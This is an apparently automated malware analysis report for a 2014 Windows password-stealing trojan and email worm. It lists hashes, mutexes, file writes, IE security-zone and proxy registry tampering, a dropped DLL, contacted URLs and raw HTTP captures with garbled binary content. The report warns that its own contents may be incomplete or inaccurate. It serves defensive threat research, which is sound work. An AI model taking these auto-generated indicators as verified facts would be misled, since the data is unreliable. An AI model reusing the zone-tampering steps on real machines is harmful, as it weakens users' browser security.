Gen.Variant.Strictor.58115_c0c73eaf2b

by malwarelabrobot on September 14th, 2014 in Malware Descriptions.

Gen:Variant.Strictor.58115 (B) (Emsisoft), Gen:Variant.Strictor.58115 (AdAware), Trojan-PSW.Win32.MSNPassword.FD, Trojan.Win32.FlyStudio.FD, GenericEmailWorm.YR, TrojanFlyStudio.YR (Lavasoft MAS)
Behaviour: Trojan-PSW, Trojan, Worm, EmailWorm

The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Summary

Dynamic Analysis

Static Analysis

Network Activity

Map

Strings from Dumps

Removals

MD5: c0c73eaf2bb3a41131599a1eb447f1e7
SHA1: 6d0ae3f5741f5c8f3c4a7aafcbfae56e7c9bcb6e
SHA256: 75369d0327c1ac86a2c900d47d1e31f838120feb941fd356ab6740ff23786546
SSDeep: 24576:RUz67U0SHuQpjuC9GWbjEdl2CLS54HpQTrv762jGkINf4:RXCFj2X2qHpQb9CP
Size: 1560576 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: VenusApp Software
Created at: 2014-03-18 04:44:09
Analyzed on: WindowsXP SP3 32-bit

Summary:

Trojan-PSW. Trojan program intended for stealing users passwords.

Payload

Behaviour	Description
EmailWorm	Worm can send e-mails.

Process activity

The Trojan creates the following process(es):
No processes have been created.
The Trojan injects its code into the following process(es):

%original file name%.exe:664

Mutexes

The following mutexes were created/opened:

CTF.TMD.MutexDefaultS-1-5-21-1844237615-1960408961-1801674531-1003
CTF.Layouts.MutexDefaultS-1-5-21-1844237615-1960408961-1801674531-1003
CTF.Asm.MutexDefaultS-1-5-21-1844237615-1960408961-1801674531-1003
CTF.Compart.MutexDefaultS-1-5-21-1844237615-1960408961-1801674531-1003
CTF.LBES.MutexDefaultS-1-5-21-1844237615-1960408961-1801674531-1003
ZonesLockedCacheCounterMutex
ZonesCacheCounterMutex
ZonesCounterMutex
WininetProxyRegistryMutex
WininetConnectionMutex
WininetStartupMutex
c:!documents and settings!adm!local settings!history!history.ie5!
c:!documents and settings!adm!cookies!
c:!documents and settings!adm!local settings!temporary internet files!content.ie5!
_!MSFTHISTORY!_
RasPbFile
ShimCacheMutex

File activity

The process %original file name%.exe:664 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\bd_bg[1].gif (72 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\CA98G7TP.html (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\Ã‚Â³Ãƒâ€°Ã‚Â¹Ã‚Â¦ÃƒÂÃƒâ€¦ÃƒÂÃ‚Â¢[1].htm (943 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\slave[1].htm (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\CACDY72N.html?partner=bd3 (621 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\Ã‚Â³Ãƒâ€°Ã‚Â¹Ã‚Â¦ÃƒÂÃƒâ€¦ÃƒÂÃ‚Â¢[1].htm (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\domains[1].js (7262 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\CAC9KN0N.htm (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\t_141_201401111[1].css (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\parking_caf_141_1402251[1].js (36 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\secondtier_caf[1].js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\slave[1].htm (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\caf[1].js (258 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\CARY3VYG.htm (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\caf[1].gif (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\Ã‚Â³Ãƒâ€°Ã‚Â¹Ã‚Â¦ÃƒÂÃƒâ€¦ÃƒÂÃ‚Â¢[1].htm (761 bytes)
C:\SkinH_EL.dll (88 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\search_language_1[1].jpg (2 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\slave[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\CA98G7TP.html (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\slave[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\caf[1].gif (0 bytes)

Registry activity

The process %original file name%.exe:664 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Multimedia\DrawDib]
"vga.drv 1024x768x32(BGR 0)" = "31,31,31,31"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1D 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5A 04 6E 69 89 F7 03 29 59 39 02 20 20 AF 60 D2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

Dropped PE files

MD5	File path
147127382e001f495d1842ee7a9e7912	c:\SkinH_EL.dll

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

No information is available.

PE Sections

Name	Virtual Address	Virtual Size	Raw Size	Entropy	Section MD5
.text	4096	584183	0	0	d41d8cd98f00b204e9800998ecf8427e
.rdata	589824	1187126	0	0	d41d8cd98f00b204e9800998ecf8427e
.data	1777664	317066	0	0	d41d8cd98f00b204e9800998ecf8427e
.rsrc	2097152	111928	98304	3.10511	3f3991c2d82ce214f293326a5d8d5c59
.vmp0	2211840	16456	0	0	d41d8cd98f00b204e9800998ecf8427e
.vmp1	2232320	1450954	1454080	5.45551	ac8d8c815aaeee74b7b73dda68b0afa4
.reloc	3686400	92	4096	0.125139	b40486e21d34f58b8e5be6e592a26b38

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL	IP
hxxp://a1.dnbizcdn.com/css/t_141_201401111.css	205.164.14.75
hxxp://www.google.com/adsense/domains/caf.js	173.194.39.114
hxxp://www.google.com/ads/search/module/ads/1.0/76529756bd9c4808112d3445d4a637b160b572c9/n/domains.js	173.194.39.114
hxxp://a1.dnbizcdn.com/js/parking_caf_141_1402251.js	205.164.14.75
hxxp://a1.dnbizcdn.com/img/w300/search_language_1.jpg	205.164.14.75
hxxp://cdn.dopa.com.wscdns.com/img/w300/bd_bg.gif	60.191.14.54
hxxp://www.gstatic.com/domainads/tracking/caf.gif?ts=1410575496766&rid=1445466	173.194.39.119
hxxp://pagead.l.doubleclick.net/static/caf/slave.html
hxxp://pagead.l.doubleclick.net/apps/domainpark/domainpark.cgi?max_radlink_len=20&r=m&fexp=21404&client=dp-dopa15_3ph_js&channel=001623&hl=ru&adtest=off&type=0&optimize_terms=on&drid=as-drid-2246028460856896&uiopt=false&oe=UTF-8&ie=UTF-8&format=p6\|r24\|r12\|s&ad=a6&adrep=2&num=0&output=caf&domain_name=www.cf089.com&v=3&allwcallad=1&adext=as1,sr1,ctc1&cd_oi=true&u_his=0&u_tz=180&dt=1410575496813&u_w=1024&u_h=768&biw=292&bih=140&psw=1020&psh=312&frm=0&uio=uv3cs1fa2sa20sl1sr1cc1-af3wi1000ff1st24sd12sv11sa12lt40ld40lv30-wi1010ff1st16sa12lt38-wi1010ff1st16sa12lt38-&rurl=http://www.cf089.com/Â³Ã‰Â¹Â¦ÃÃ…ÃÂ¢.html
hxxp://cdn.dopa.com.wscdns.com/js/secondtier_caf.js	60.191.14.54
hxxp://65.19.157.196/Â³Ã‰Â¹Â¦ÃÃ…ÃÂ¢.html?partner=bd3
hxxp://www.gstatic.com/domainads/tracking/caf.gif?ts=1410575497829&rid=6549563	173.194.39.119
hxxp://pagead.l.doubleclick.net/apps/domainpark/domainpark.cgi?max_radlink_len=20&r=m&fexp=21404&client=dp-dopa15_3ph_js&channel=001623&hl=ru&adtest=off&type=0&optimize_terms=on&drid=as-drid-2246028460856896&uiopt=false&oe=UTF-8&ie=UTF-8&format=p6\|r24\|r12\|s&ad=a6&adrep=2&num=0&output=caf&domain_name=www.cf089.com&v=3&allwcallad=1&adext=as1,sr1,ctc1&cd_oi=true&u_his=1&u_tz=180&dt=1410575497844&u_w=1024&u_h=768&biw=292&bih=140&psw=1020&psh=312&frm=0&uio=uv3cs1fa2sa20sl1sr1cc1-af3wi1000ff1st24sd12sv11sa12lt40ld40lv30-wi1010ff1st16sa12lt38-wi1010ff1st16sa12lt38-&rurl=http://www.cf089.com/Â³Ã‰Â¹Â¦ÃÃ…ÃÂ¢.html?partner=bd3
hxxp://65.19.157.196/Â³Ã‰Â¹Â¦ÃÃ…ÃÂ¢.html?partner=bd3&sac=&format=json&oc=false&uc=undefined
hxxp://cdn.dopa.com/js/secondtier_caf.js	60.191.14.54
hxxp://dp.g.doubleclick.net/apps/domainpark/domainpark.cgi?max_radlink_len=20&r=m&fexp=21404&client=dp-dopa15_3ph_js&channel=001623&hl=ru&adtest=off&type=0&optimize_terms=on&drid=as-drid-2246028460856896&uiopt=false&oe=UTF-8&ie=UTF-8&format=p6\|r24\|r12\|s&ad=a6&adrep=2&num=0&output=caf&domain_name=www.cf089.com&v=3&allwcallad=1&adext=as1,sr1,ctc1&cd_oi=true&u_his=0&u_tz=180&dt=1410575496813&u_w=1024&u_h=768&biw=292&bih=140&psw=1020&psh=312&frm=0&uio=uv3cs1fa2sa20sl1sr1cc1-af3wi1000ff1st24sd12sv11sa12lt40ld40lv30-wi1010ff1st16sa12lt38-wi1010ff1st16sa12lt38-&rurl=http://www.cf089.com/Â³Ã‰Â¹Â¦ÃÃ…ÃÂ¢.html	173.194.39.90
hxxp://dp.g.doubleclick.net/apps/domainpark/domainpark.cgi?max_radlink_len=20&r=m&fexp=21404&client=dp-dopa15_3ph_js&channel=001623&hl=ru&adtest=off&type=0&optimize_terms=on&drid=as-drid-2246028460856896&uiopt=false&oe=UTF-8&ie=UTF-8&format=p6\|r24\|r12\|s&ad=a6&adrep=2&num=0&output=caf&domain_name=www.cf089.com&v=3&allwcallad=1&adext=as1,sr1,ctc1&cd_oi=true&u_his=1&u_tz=180&dt=1410575497844&u_w=1024&u_h=768&biw=292&bih=140&psw=1020&psh=312&frm=0&uio=uv3cs1fa2sa20sl1sr1cc1-af3wi1000ff1st24sd12sv11sa12lt40ld40lv30-wi1010ff1st16sa12lt38-wi1010ff1st16sa12lt38-&rurl=http://www.cf089.com/Â³Ã‰Â¹Â¦ÃÃ…ÃÂ¢.html?partner=bd3	173.194.39.90
hxxp://cdn.dopa.com/img/w300/bd_bg.gif	60.191.14.54
hxxp://www.cf089.com/Â³Ã‰Â¹Â¦ÃÃ…ÃÂ¢.html?partner=bd3&sac=&format=json&oc=false&uc=undefined
hxxp://www.cf089.com/Â³Ã‰Â¹Â¦ÃÃ…ÃÂ¢.html?partner=bd3
hxxp://dp.g.doubleclick.net/static/caf/slave.html	173.194.39.90

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

Traffic

GET /img/w300/bd_bg.gif HTTP/1.1

Accept: */*

Referer: hXXp://VVV.cf089.com/.........html

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: cdn.dopa.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Server: Tengine/1.4.2

Date: Sat, 13 Sep 2014 02:31:36 GMT

Content-Type: image/gif

Content-Length: 72

Last-Modified: Sat, 07 Dec 2013 07:50:12 GMT

Connection: keep-alive

Accept-Ranges: bytes

GIF89a...............................!.......,...........(...c...T..M.
.;....

GET /js/secondtier_caf.js HTTP/1.1

Accept: */*

Referer: hXXp://VVV.cf089.com/.........html

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: cdn.dopa.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Server: Tengine/1.4.2

Date: Sat, 13 Sep 2014 02:31:36 GMT

Content-Type: application/x-javascript

Last-Modified: Wed, 25 Dec 2013 08:26:45 GMT

Transfer-Encoding: chunked

Connection: keep-alive

Vary: Accept-Encoding

Content-Encoding: gzip
2a3.............U[k.0.. A..E..e...-l..{.`tO..Y>.... .m....#.......8
.|.;..hU).6ZE..-'.q. .D...q.R..,H.R...4p_.u4.APE..{9PR....xZ...U.8!.3.
C.kQ?.^......$R8.E@{.....c.UF.\...NIerN2.........^W..I]L..Y...R...pr!X
..7...p..EH.5.......$H..2-..............4......([email protected].~
.].\/!..;z...X.......s.]_..1B.6j...6#..p.N9..<.qK.kL......8".6] .J.
jJ..ao..yVs._Edq........s.}.Q. ...ut...Ew.DwAj#}.}"I..1..}}....pv.....
.qV......z.l....q..5P..V..3...c...)..%<m...n..GV.A%..F{...g.....2..
...Z-.......z...Kx.eU..d.w.9.......o...d RB.{.F.r...0..~..l..Q.A..@ ..
.-sD.4.....Y#..D......'7....J.....F...H.xsDY.JO...:......#x.q6..q.X.5.
-......u.k........WC....'..Y......F...... ....w.....ig.......0..

GET /domainads/tracking/caf.gif?ts=1410575496766&rid=1445466 HTTP/1.1

Accept: */*

Referer: hXXp://VVV.cf089.com/.........html

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: VVV.gstatic.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Content-Type: image/gif

Last-Modified: Fri, 01 Jun 2012 22:49:22 GMT

Date: Sat, 13 Sep 2014 02:31:36 GMT

Pragma: no-cache

Expires: Fri, 01 Jan 1990 00:00:00 GMT

Cache-Control: no-cache, must-revalidate

X-Content-Type-Options: nosniff

Server: sffe

Content-Length: 43

X-XSS-Protection: 1; mode=block

Alternate-Protocol: 80:quic,p=0.002
GIF89a.............!.......,[email protected]..;....


GET /domainads/tracking/caf.gif?ts=1410575497829&rid=6549563 HTTP/1.1

Accept: */*

Referer: hXXp://VVV.cf089.com/.........html?partner=bd3

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: VVV.gstatic.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Content-Type: image/gif

Last-Modified: Fri, 01 Jun 2012 22:49:22 GMT

Date: Sat, 13 Sep 2014 02:31:37 GMT

Pragma: no-cache

Expires: Fri, 01 Jan 1990 00:00:00 GMT

Cache-Control: no-cache, must-revalidate

X-Content-Type-Options: nosniff

Server: sffe

Content-Length: 43

X-XSS-Protection: 1; mode=block

Alternate-Protocol: 80:quic,p=0.002
GIF89a.............!.......,[email protected]..;..

GET /Â³Ã‰Â¹Â¦ÃÃ…ÃÂ¢.html?partner=bd3 HTTP/1.1

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml xml, */*

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: VVV.cf089.com

Connection: Keep-Alive

Cookie: PHPSESSID=d3r5ad3q9eou8nijgqkicflis1


HTTP/1.1 404 Not Found

Server: Tengine/1.4.2

Date: Sat, 13 Sep 2014 02:31:36 GMT

Content-Type: text/html;charset=utf-8

Transfer-Encoding: chunked

Connection: keep-alive

Vary: Accept-Encoding

X-Powered-By: PHP/5.3.10

Expires: Thu, 19 Nov 1981 08:52:00 GMT

Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0

Pragma: no-cache

Content-Encoding: gzip
1191.............9gs....eo_..XFZ$.`.".&1....B-vg......R.. YV.;......,.
=.[.EQ..............Lz..'.........N3.o....Zv..-E&.K.3Si....D..`f1C.N..
..t D,..jJ..........hYz*..T*.J$..Bp1..bJ4^.}.........A.[U.Us..*t2.t.cT
.p.........h...CdZS-.Z....H......ZAL|.`E.0.5d[.?A...-...0......).A.0(K
j....wDa.....-.S1f.5..U..t!...!....F.H."M.&#SD."-....O.O...&j....!....
.I....2....I..%..P..r.Eb...x.O........&kH.....x.)3....3.!.C........!..
....<.....N.L...x<..r.......q......]..y......m:E..45E..l.SVmY..9
v.:x....,..6.N.f.}..9.G...y..p.2....<[email protected]. ...e.
.......VA..am..R..a1..VJ.....6.........r.....YZ@......$....V..... ..?7
__k.......z..u.F..........7.7_?n.x5.d.)../.kI*..(..3.."#E..a.%P.....~.
M........?...q..K.7....j...y.v........./.7o.m~.q....;p.T...../w...>
..x.;[email protected]{_.h].Z..Q...0l].i.{Z......9,~..~.R....;W.....=
....;{o.6....../..po.D{.Bx2.z.x~......_Z.....msg.....o.v............Z.
/./...}.o...}[....o>k~{...qo.!..o......d..3..}.............=6...:.|
o.{G..m7.{.w.!......\... .P.y...w.K?..>............on..z...........
m.r............~........h...3x.[....._../9 .<.'..P1.......{_.u.=...
...7......A?...:.G_..x.z.Q......Ow.~..v.CX...=[.|...W`.]..7^......V..Q
....._w....:...7/.m.x.............2F..9..w..'...S.>.....q..........
.....{V..GG;.^...i.xX..s`...8.o...}V..j8v...\.g{.o.....]........N..|.N
.8.L..$.J.|.i.M*..;.".^e.D..qIeT.......T..02...FH.iCduPDMAZ..0!k......
..l..m..2.F....Sg|..h........g.....s.k.<.H...DX.[B...B...^.........
.....1.f..DtX9.m^.?.QA...M`e.D..............t~.H#..x.#.....5.>.<<< skipped >>>

GET /Â³Ã‰Â¹Â¦ÃÃ…ÃÂ¢.html?partner=bd3&sac=&format=json&oc=false&uc=undefined HTTP/1.1

Accept: */*

Referer: hXXp://VVV.cf089.com/.........html?partner=bd3

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: VVV.cf089.com

Connection: Keep-Alive

Cookie: PHPSESSID=d3r5ad3q9eou8nijgqkicflis1


HTTP/1.1 404 Not Found

Server: Tengine/1.4.2

Date: Sat, 13 Sep 2014 02:31:37 GMT

Content-Type: text/html;charset=utf-8

Transfer-Encoding: chunked

Connection: keep-alive

Vary: Accept-Encoding

X-Powered-By: PHP/5.3.10

Expires: Thu, 19 Nov 1981 08:52:00 GMT

Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0

Pragma: no-cache

Content-Encoding: gzip
120e.............:ks.W..e.l....5.eK...-Y.K.l....R.f.Fc.f.....*$q.....J
 [email protected]<..u...}fF......IP.....Ow.~... 6.MgS.DQ/.Djy|v*J....
@....cDf2..%h..H..... K...N..dQ....[.V=..GVyoz.[..h...t.=.=.......ZY..
.#...p...A...........F..P.!...#Iw..."Y{0B...{1.!.-2....C/.C.wtX.t...._
(.a.........D.UT.....N.....0...4.......G..h...s....R..".......8<.e.
i........N..,.~zB.........I...2.#oE.<e.UeM..xY.!......XUPt..K..L..g
......8r......7T1B..FW....G)*.KC......$..lP.!.#....Z.^..O..o.~....7t].
"Tg.-a..!...c.....N.a.U.1rJ."..L.#]d...']..#[email protected]....~.......
E.~. o.#.j .b.:#.r.q..khx..f..Qy.R2.....aX...VQ...'i.....{......Mr....
y..y.......K.._4o.!.??o...z............W......2......... G(..0..!5B...
.%.....f........].rQ.. {..i.....g.w..x.......s.i...<....u..y...W..j
.....w[7..}....o.Dg.........J...,.7.k.../>m.;o>.l.4..5.~k.....7.
.. ...._\j....[..._.7.zh.^_.}.e.9c......[./..{....}fv.O..O..}...7.a..t
A.........//[..i...3....7A..o.1D..s.s...[[x..-.!..........[?.i?;c...Ks
.%.cw............. ..wZ...vm.k~..y..y.F{s................ww......-....
..O....?.'.....m.......|....y........./@U..n............./,./....5/>
;no=...;..1.?h..Ri...M....y.'..u.......u..^.}.Y......{.m=l]}e.y..~d>
;.........}.H[.l.^}...J...K.W..~..y.A.[.....``^~...G.:..t.w.e........;
;...A../.j^......f..O-.;...-}<......g.....@......!...6[_o7..o......
...._..m...F... ......]..K.....c..)J.......FE>..T.vJL.Q.*.H.."..X.c
.TBu.L1.......V-..\Fr..0!...a&j.*..:...xd......N.v9.....X..]jx.C-..q..
-...A.H..]`KH..X...Q...h.........s...`..AtIY..Z.=.!Ar.64 .iD..*..L<<< skipped >>>

GET /static/caf/slave.html HTTP/1.1

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml xml, */*

Referer: hXXp://VVV.cf089.com/.........html

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: dp.g.doubleclick.net

Connection: Keep-Alive

Cookie: id=c21c6444d00007f||t=1360768149|et=730|cs=002213fd480b36e81315d0d96e


HTTP/1.1 200 OK

Vary: Accept-Encoding

Content-Encoding: gzip

Content-Type: text/html

Last-Modified: Wed, 18 Sep 2013 22:34:18 GMT

Date: Sat, 13 Sep 2014 02:20:06 GMT

Expires: Sat, 13 Sep 2014 03:20:06 GMT

X-Content-Type-Options: nosniff

Server: sffe

Content-Length: 706

X-XSS-Protection: 1; mode=block

Age: 690

Cache-Control: public, max-age=3600

Alternate-Protocol: 80:quic,p=0.002

X-Google-Cookies-Blocked: id=
...........U.n.@.}.WL.!.E.M.<T.S.K.$..8J J$.....v.k....]_..hS?...3g
.\.4.u.m.......0zl.{m :.O.mJ;V....>\...(.......5....X].!.SkLS. ...9
.p.K.g..q..,6O;..m=s. ...m...P...u..xK..C&....DH..w&...Y.:8...(.G.V.D.
.f.h...5..Jn.ao..~y.......>I<M.*n.....].../d..>F......o.p/. .
.B..{i.V..H.1K..<.. #.6... ..2\A...j.1...j...9d..<.Cw.l...<.$
...C.g.C..g.=.V.E....e.2......./.c.......,........q.*}Vc.^....i...R.~.
.d..$........'...|.o..X..e&o....*.......;]..>~..>c..Z:.m...:R...
.j"..D...@!.vL7..4.W*....#7W.r.@M}<....W.p7|ds...Z.0O..7G.Jq....c..
..o.uM.|.Q$.......|..d.E....w.u.Y.....c...c..Fe*..N....S..y/K.yz r....
v...;ezX.cD.t..uo.OI..yK`0..yxK...W.'{....0J..VA.....!.qC'..Q..u}L..M.
U..R...hx.!...j&`...k .....yv.....-n.......


GET /apps/domainpark/domainpark.cgi?max_radlink_len=20&r=m&fexp=21404&client=dp-dopa15_3ph_js&channel=001623&hl=ru&adtest=off&type=0&optimize_terms=on&drid=as-drid-2246028460856896&uiopt=false&oe=UTF-8&ie=UTF-8&format=p6|r24|r12|s&ad=a6&adrep=2&num=0&output=caf&domain_name=VVV.cf089.com&v=3&allwcallad=1&adext=as1,sr1,ctc1&cd_oi=true&u_his=1&u_tz=180&dt=1410575497844&u_w=1024&u_h=768&biw=292&bih=140&psw=1020&psh=312&frm=0&uio=uv3cs1fa2sa20sl1sr1cc1-af3wi1000ff1st24sd12sv11sa12lt40ld40lv30-wi1010ff1st16sa12lt38-wi1010ff1st16sa12lt38-&rurl=http://VVV.cf089.com/Â³Ã‰Â¹Â¦ÃÃ…ÃÂ¢.html?partner=bd3 HTTP/1.1

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml xml, */*

Referer: hXXp://VVV.cf089.com/.........html?partner=bd3

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: dp.g.doubleclick.net

Connection: Keep-Alive

Cookie: id=c21c6444d00007f||t=1360768149|et=730|cs=002213fd480b36e81315d0d96e


HTTP/1.1 200 OK

P3P: policyref="hXXp://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"

Content-Type: text/html; charset=UTF-8

